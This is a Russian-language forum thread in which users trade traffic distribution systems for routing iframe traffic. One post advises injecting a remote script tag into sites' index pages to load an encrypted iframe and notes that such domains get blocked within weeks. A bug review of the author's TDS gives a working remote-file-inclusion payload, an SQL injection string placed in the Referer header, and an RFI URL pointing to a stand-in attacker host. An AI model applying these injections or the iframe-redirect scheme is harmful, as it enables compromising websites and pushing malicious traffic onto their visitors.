Старый 08.09.2010, 18:45   #1
lukmus
 
Аватар для lukmus
 
Регистрация: 11.08.2010
Сообщений: 135
Репутация: 20
По умолчанию TDS под iframe

сабж, желательно бесплатные и нормальные
__________________
Контактный XMPP: lukmus[собака]wallstreetjabber.biz
lukmus вне форума   Ответить с цитированием
Старый 08.09.2010, 19:03   #2
emillord
 
Аватар для emillord
 
Регистрация: 05.07.2010
Сообщений: 12
Репутация: 9
По умолчанию

Бесплатная - Simple tds, но оригинальная версия 1) дырявая 2) старая
Так что советую скачать мод, качать тут:
http://jacksoft.biz/wp-content/uploads/2010/01/sTDS.zip

p/s 12k уников mix траффа норм держит)))
p/p/s старые версии этого мода забирали 1% траффа себе, в новых версиях вроде такого нету.
emillord вне форума   Ответить с цитированием
Старый 09.09.2010, 01:47   #3
lukmus
 
Аватар для lukmus
 
Регистрация: 11.08.2010
Сообщений: 135
Репутация: 20
По умолчанию

а никто не хочет скооперироватся и написать вместе одну нормальную бесплатную TDS
__________________
Контактный XMPP: lukmus[собака]wallstreetjabber.biz
lukmus вне форума   Ответить с цитированием
Старый 09.09.2010, 11:43   #4
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Не хотим =(
Да вполне хватает и тех, что уже есть. А если не хватает, то простую ТДС писать меньше вечера.
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 10.09.2010, 14:27   #5
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

http://keitarotds.com/ - дешёвая тдска
ещё можешь поискать сутру начальные версии и atraftds (иль как-то так), может их уже выкинули с полупривата ;-)
opium вне форума   Ответить с цитированием
Старый 10.09.2010, 14:43   #6
slashd
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 27
По умолчанию

Можно траф гнать и без тдски - достаточно в индексные страницы вставлять
Код:
<script src=http://othersite/includes.js></script>
а в http://othersite/includes.js вставить уже шифрованный фрейм, тем самым управлять потоком.
Конечно функционала никакого, но держать на отдельном домене SimpleTDS накладно. По собственному опыту знаю что блочат их за неделю другую.
imho://определенно работает и даёт результаты.
slashd вне форума   Ответить с цитированием
Старый 11.09.2010, 00:39   #7
hard
Banned
 
Регистрация: 06.07.2010
Сообщений: 50
Репутация: 1
По умолчанию

Цитата:
Сообщение от lukmus Посмотреть сообщение
сабж, желательно бесплатные и нормальные
http://php.net
hard вне форума   Ответить с цитированием
Старый 16.09.2010, 07:51   #8
lukmus
 
Аватар для lukmus
 
Регистрация: 11.08.2010
Сообщений: 135
Репутация: 20
По умолчанию

Цитата:
Сообщение от hard Посмотреть сообщение
http://php.net
Цитата:
Сообщение от m0Hze
Не хотим =(
Да вполне хватает и тех, что уже есть. А если не хватает, то простую ТДС писать меньше вечера.
два вечера
http://blog.lukmus.ru/?p=495
И кстати, прошу проверить на баги.
__________________
Контактный XMPP: lukmus[собака]wallstreetjabber.biz
lukmus вне форума   Ответить с цитированием
Старый 17.09.2010, 10:26   #9
Atra Pluvia
 
Регистрация: 07.07.2010
Сообщений: 21
Репутация: 53
По умолчанию

Цитата:
И кстати, прошу проверить на баги.
У тебя там в некоторых файлах, например, includes/promo.php , RFI при rg==on.

PHP код:
<?php
require_once ($inc_dir."header.php");
...
Самое элементарное, это
inc_dir=data:, <?php phpinfo();?>
, либо как LFI, если сервер не позволяет.

Это, конечно, не зиродей, но все же делать так нельзя.

INSERT SQL-инъекция:
PHP код:
//to.php
...
fix_traf($_SERVER['HTTP_REFERER'],$_SERVER['REMOTE_ADDR'],$_SERVER['HTTP_USER_AGENT'],$inc_dir);
...
//lib.php
function fix_traf($ref,$ip,$agent,$inc_dir)
{
    require(
$inc_dir."connect.php");
    if(!
$next)return false;
    
$geo=geo($ip);
    
$date=date("Y-m-d H-i-s");
    
$sql="INSERT INTO traf VALUES (1,'$ref','$ip','$agent','".$geo."','$date');";
    
mysql_query($sql);
    
//return mysql_error();


Вот, поставь это в REFERER, а затем обратись к to.php для теста и посмотри запись в бд:
Код:
s', '127.0.0.1', version(), '', '2010-09-16 22:12:41')#
Всё это, по-моему, достаточно очевидно, и найдено при только беглом осмотре, так что там наверняка еще что-нибудь есть =(
Atra Pluvia вне форума   Ответить с цитированием
Старый 17.09.2010, 17:13   #10
lukmus
 
Аватар для lukmus
 
Регистрация: 11.08.2010
Сообщений: 135
Репутация: 20
По умолчанию

Цитата:
Сообщение от Atra Pluvia Посмотреть сообщение
У тебя там в некоторых файлах, например, includes/promo.php , RFI при rg==on.

PHP код:
<?php
require_once ($inc_dir."header.php");
...
Самое элементарное, это
inc_dir=data:, <?php phpinfo();?>
, либо как LFI, если сервер не позволяет.
хочу подъяснится, это уязвимость так используется:
site.com/path.php?bla=blabla&inc_dir=http://hacksite.com/hackdir/ , где в hackdir лежит подставной header.php, правильно?
Но в config.php который везде подключается лежит же
PHP код:
global $inc_dir;
$inc_dir=$_SERVER['DOCUMENT_ROOT']."/includes/"
А вообще большое спасибо, буду исправлять.
__________________
Контактный XMPP: lukmus[собака]wallstreetjabber.biz
lukmus вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot